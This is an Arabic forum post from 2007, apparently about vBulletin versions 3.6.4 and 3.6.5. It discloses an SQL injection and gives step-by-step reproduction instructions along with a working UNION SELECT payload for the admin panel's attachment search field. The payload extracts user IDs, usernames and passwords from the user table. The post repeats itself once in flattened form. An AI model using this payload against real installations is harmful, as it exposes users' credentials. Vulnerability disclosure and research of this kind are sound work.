شبكة آرا ويب التطويرية - عرض مشاركة واحدة - ثغرة مجربة على 3.6.5 و 3.6.4 "جديدة" من نوع sql injection

18-May-2007, 05:38 PM

النسخ المصابة :
3.6.5
3.6.4

نوع الثغرة :
sql injection

خطورتها :
ليست خطره ابدا لان تنفيذها يتم بواسطة مدير الموقع

طريقة التنفيذ :
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:

كود PHP:


			
) union select 1,1,1,1,1,userid,password,1,username from user -- 9

تحياتي
ابو عمار

18-May-2007, 05:38 PM	#1 (permalink)
مدير عام تاريخ التسجيل: May 2007 المشاركات: 614	ثغرة مجربة على 3.6.5 و 3.6.4 "جديدة" من نوع sql injection النسخ المصابة : 3.6.5 3.6.4 نوع الثغرة : sql injection خطورتها : ليست خطره ابدا لان تنفيذها يتم بواسطة مدير الموقع طريقة التنفيذ : 1. Log in to admin panel 2. Go to Attachments->Search 3. Place the following string in the Attached Before field: كود PHP: `) union select 1,1,1,1,1,userid,password,1,username from user -- 9` تحياتي ابو عمار __________________ منتديات شبكة آرا ويب لخدمات الانترنت http://www.arawebserv.com/vb لطلبات الاشراف والمتابعة admin@arawebserv.com